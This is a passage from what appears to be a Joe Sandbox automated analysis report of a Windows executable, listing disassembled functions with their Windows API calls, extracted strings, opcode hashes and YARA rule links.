                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: @U=u$ComboBox$ListBox
                                                            • API String ID: 1536045017-2258501812
                                                            • Opcode ID: 2efea23a70cef2891984c4056711a68ae1d29073afa7f84bf1c0013f5382f871
                                                            • Instruction ID: 0be2f8a2295e4f670e05c77efa5b4cf40692808699820f285bc0f6fc3669e9ea
                                                            • Opcode Fuzzy Hash: 2efea23a70cef2891984c4056711a68ae1d29073afa7f84bf1c0013f5382f871
                                                            • Instruction Fuzzy Hash: 7821F274A00308BBDF01ABA4DC99EFEBBB8EF58300F100016BA51973A1DB758819DB30
                                                            Function 00D29163 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32 ref: 00D2916F
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00D29184
                                                            • _wcscmp.LIBCMT ref: 00D29196
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D29211
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-1428604138
                                                            • Opcode ID: 41e0babf2758352fb01cad70cf1e832db74d608f36b6786cb64c83267521117c
                                                            • Instruction ID: 84aaf4960e70d75bb2c1ebcb3fcf921023ef026fb46916b774194b25aacfe197
                                                            • Opcode Fuzzy Hash: 41e0babf2758352fb01cad70cf1e832db74d608f36b6786cb64c83267521117c
                                                            • Instruction Fuzzy Hash: EB112C76248317F9FA213624FC2ADB7B79C9F25725F300026FE10E50D2FE6198516AB5
                                                            Function 00CF6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00CF6E3E
                                                              • Part of subcall function 00CF8B28: __getptd_noexit.LIBCMT ref: 00CF8B28
                                                            • __gmtime64_s.LIBCMT ref: 00CF6ED7
                                                            • __gmtime64_s.LIBCMT ref: 00CF6F0D
                                                            • __gmtime64_s.LIBCMT ref: 00CF6F2A
                                                            • __allrem.LIBCMT ref: 00CF6F80
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CF6F9C
                                                            • __allrem.LIBCMT ref: 00CF6FB3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CF6FD1
                                                            • __allrem.LIBCMT ref: 00CF6FE8
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CF7006
                                                            • __invoke_watson.LIBCMT ref: 00CF7077
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction ID: 83e816661e8f4be4ebaf64353bfe83dc6f6cd36b9eb1b5dc70245d64b6a67a98
                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction Fuzzy Hash: E371D776A0071BABD7549F69DC81B7AB7A8EF04724F144229F624D72C1EB70DE4087A2
                                                            Function 00D32527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D32542
                                                            • GetMenuItemInfoW.USER32(00D95890,000000FF,00000000,00000030), ref: 00D325A3
                                                            • SetMenuItemInfoW.USER32(00D95890,00000004,00000000,00000030), ref: 00D325D9
                                                            • Sleep.KERNEL32(000001F4), ref: 00D325EB
                                                            • GetMenuItemCount.USER32(?), ref: 00D3262F
                                                            • GetMenuItemID.USER32(?,00000000), ref: 00D3264B
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00D32675
                                                            • GetMenuItemID.USER32(?,?), ref: 00D326BA
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D32700
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D32714
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D32735
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: ebd889249a02814626538551703361ab910475a842f27e35329dc8de7f3b9d68
                                                            • Instruction ID: 755801b4221680e410ce78a4308698f089c4d54f30dc0d8ee6fe496d48262745
                                                            • Opcode Fuzzy Hash: ebd889249a02814626538551703361ab910475a842f27e35329dc8de7f3b9d68
                                                            • Instruction Fuzzy Hash: F46168B0900349AFDB21CFA4D889ABE7BB9FB45344F180069E982E7251D731AE05DB31
                                                            Function 00D56F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D56FA5
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00D56FA8
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00D56FCC
                                                            • _memset.LIBCMT ref: 00D56FDD
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D56FEF
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00D57067
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: 1e6f9082b0055370454ff39723104d3fb1bcd72975df785f9323d3836ac7184c
                                                            • Instruction ID: 51ba3c98c65e3b46c624581a4ec4dbb1812d39b88c2e7698d745b1a6b7532df0
                                                            • Opcode Fuzzy Hash: 1e6f9082b0055370454ff39723104d3fb1bcd72975df785f9323d3836ac7184c
                                                            • Instruction Fuzzy Hash: EC615A75900208AFDB11DFA8DC81EEE77F8EB09711F14416AFE14EB2A1C771A945DBA0
                                                            Function 00D26B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D26BBF
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00D26C18
                                                            • VariantInit.OLEAUT32(?), ref: 00D26C2A
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D26C4A
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00D26C9D
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00D26CB1
                                                            • VariantClear.OLEAUT32(?), ref: 00D26CC6
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00D26CD3
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D26CDC
                                                            • VariantClear.OLEAUT32(?), ref: 00D26CEE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D26CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: bff81a92b8b3103fb11ea76c5997350aed30e0706f1d49d46401f1e3907a6b03
                                                            • Instruction ID: 30529ae500ebee65f4ab7e5710a911161635b102517dae9858f12edcc5aa32c3
                                                            • Opcode Fuzzy Hash: bff81a92b8b3103fb11ea76c5997350aed30e0706f1d49d46401f1e3907a6b03
                                                            • Instruction Fuzzy Hash: 2A413175A003299FCF00EFA4D8449AEBBB9EF18355F008069E955EB361CB31E945DBB0
                                                            Function 00D5D43E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 00D5D47C
                                                            • GetSystemMetrics.USER32(0000000F), ref: 00D5D49C
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00D5D6D7
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00D5D6F5
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00D5D716
                                                            • ShowWindow.USER32(00000003,00000000), ref: 00D5D735
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00D5D75A
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00D5D77D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID: @U=u
                                                            • API String ID: 1211466189-2594219639
                                                            • Opcode ID: a523de851747da636a77adc0ee40583f618a3b8b3849cf2ac4f97973f2b4ef5f
                                                            • Instruction ID: a162a0c96008a18b0a3d1017bc252d8b8028d641b3c26abdedf635db95b90cec
                                                            • Opcode Fuzzy Hash: a523de851747da636a77adc0ee40583f618a3b8b3849cf2ac4f97973f2b4ef5f
                                                            • Instruction Fuzzy Hash: 43B17A71600219EBDF24CF68C9857AD7BB2FF08712F188069EC499F295E734A958CB70
                                                            Function 00D483BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • CoInitialize.OLE32 ref: 00D48403
                                                            • CoUninitialize.OLE32 ref: 00D4840E
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00D62BEC,?), ref: 00D4846E
                                                            • IIDFromString.OLE32(?,?), ref: 00D484E1
                                                            • VariantInit.OLEAUT32(?), ref: 00D4857B
                                                            • VariantClear.OLEAUT32(?), ref: 00D485DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: 7a110d187ddcf4d6a66adac901bb159dc2887933459845719814b5359f84a3b1
                                                            • Instruction ID: c76a4c5d1a892848f8502920e79b8f243e34c06b9f9573d268f14964dbe91e17
                                                            • Opcode Fuzzy Hash: 7a110d187ddcf4d6a66adac901bb159dc2887933459845719814b5359f84a3b1
                                                            • Instruction Fuzzy Hash: 1D618C706083129FC710DF14C848B6EBBE9EF49794F144419F9869B291CB70ED48EBB2
                                                            Function 00CD2E26 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 186windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00CD2EAE
                                                              • Part of subcall function 00CD1DB3: GetClientRect.USER32(?,?), ref: 00CD1DDC
                                                              • Part of subcall function 00CD1DB3: GetWindowRect.USER32(?,?), ref: 00CD1E1D
                                                              • Part of subcall function 00CD1DB3: ScreenToClient.USER32(?,?), ref: 00CD1E45
                                                            • GetDC.USER32 ref: 00D0CD32
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D0CD45
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00D0CD53
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00D0CD68
                                                            • ReleaseDC.USER32(?,00000000), ref: 00D0CD70
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D0CDFB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: @U=u$U
                                                            • API String ID: 4009187628-4110099822
                                                            • Opcode ID: b567498091cf3a73d712f7b4c10f7597492664a44f7bd557846e535d1ee9962e
                                                            • Instruction ID: b58daa554cc39b568aa535d7a4690d615dd9347e352d38fc0fe08e76d6129568
                                                            • Opcode Fuzzy Hash: b567498091cf3a73d712f7b4c10f7597492664a44f7bd557846e535d1ee9962e
                                                            • Instruction Fuzzy Hash: E871A031500205EFCF219F64C884BAA7BB5FF58321F18537AEE599A2A6D7318841EB70
                                                            Function 00D45732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00D45793
                                                            • inet_addr.WSOCK32(?), ref: 00D457D8
                                                            • gethostbyname.WSOCK32(?), ref: 00D457E4
                                                            • IcmpCreateFile.IPHLPAPI ref: 00D457F2
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00D45862
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00D45878
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00D458ED
                                                            • WSACleanup.WSOCK32 ref: 00D458F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: bd34c45e05f40817af689ba19bc80d675bd8ea5cd969c1298e376c4371b92552
                                                            • Instruction ID: 0d79eef0dfe29eb565c694a32108062838a439f20512f1af4c9a5d13d6d7185b
                                                            • Opcode Fuzzy Hash: bd34c45e05f40817af689ba19bc80d675bd8ea5cd969c1298e376c4371b92552
                                                            • Instruction Fuzzy Hash: DE514E356047009FDB10AF25EC45B2A77E4EF48720F14456AF996DB3A6DB70E900DB61
                                                            Function 00D3B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00D3B4D0
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00D3B546
                                                            • GetLastError.KERNEL32 ref: 00D3B550
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00D3B5BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 0048a39294dfd424eead27f16bf4d79708ec964c773a08479b2b5e4bc7fb5639
                                                            • Instruction ID: cbe781d7522ddf4b507727038ee7825b072deb1f137e6af88d818d348f4a1ed4
                                                            • Opcode Fuzzy Hash: 0048a39294dfd424eead27f16bf4d79708ec964c773a08479b2b5e4bc7fb5639
                                                            • Instruction Fuzzy Hash: C8318135A00205AFCB00EF68C845EAEB7B4FF44321F544167EA06DB291DB71DA45DB61
                                                            Function 00D561D3 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00D561EB
                                                            • GetDC.USER32(00000000), ref: 00D561F3
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D561FE
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00D5620A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00D56246
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00D56257
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00D5902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00D56291
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00D562B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID: @U=u
                                                            • API String ID: 3864802216-2594219639
                                                            • Opcode ID: 2f26ad8bd9960491a4e15b105947459bbc80bf6be2fa349ec4b67ae5e33c38fc
                                                            • Instruction ID: 0a47ab9ad530667a1ba86af3f51847a1e98988cd7d2e22598b134a9160d05e72
                                                            • Opcode Fuzzy Hash: 2f26ad8bd9960491a4e15b105947459bbc80bf6be2fa349ec4b67ae5e33c38fc
                                                            • Instruction Fuzzy Hash: 84312972201314AFEF118F548C8AFAB3BA9EB59766F084065FE08DE2A1D6759841CB74
                                                            Function 00D488AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00D488D7
                                                            • CoInitialize.OLE32(00000000), ref: 00D48904
                                                            • CoUninitialize.OLE32 ref: 00D4890E
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00D48A0E
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00D48B3B
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00D62C0C), ref: 00D48B6F
                                                            • CoGetObject.OLE32(?,00000000,00D62C0C,?), ref: 00D48B92
                                                            • SetErrorMode.KERNEL32(00000000), ref: 00D48BA5
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00D48C25
                                                            • VariantClear.OLEAUT32(?), ref: 00D48C35
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID:
                                                            • API String ID: 2395222682-0
                                                            • Opcode ID: 4c91732bbd5291c72644f27d2b2137252b16d676521a4b3331e1b9b1980f8d21
                                                            • Instruction ID: e7b96dffb86b136e7f1aa49ff86044ae1bc884779f68351ee01537ff4b39beef
                                                            • Opcode Fuzzy Hash: 4c91732bbd5291c72644f27d2b2137252b16d676521a4b3331e1b9b1980f8d21
                                                            • Instruction Fuzzy Hash: E6C114B1608305AFC700DF64C88492BB7E9FF89788F04491DF98A9B251DB71ED05DB62
                                                            Function 00D37990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00D37A6C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
